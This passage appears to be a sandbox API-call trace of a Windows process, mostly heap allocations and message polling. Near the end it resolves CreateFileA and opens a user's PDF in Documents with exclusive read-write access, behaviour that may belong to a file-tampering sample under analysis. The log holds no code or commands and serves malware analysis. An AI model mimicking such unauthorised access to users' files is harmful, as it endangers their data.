wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.245] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.245] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.245] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0173.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.245] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.246] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.249] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.250] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.250] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0173.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.251] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0173.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", cchWideChar=68, lpMultiByteStr=0x9aa4f8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpUsedDefaultChar=0x0) returned 68 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.252] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xdf9hoa.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0173.268] MultiByteToWideChar (in: 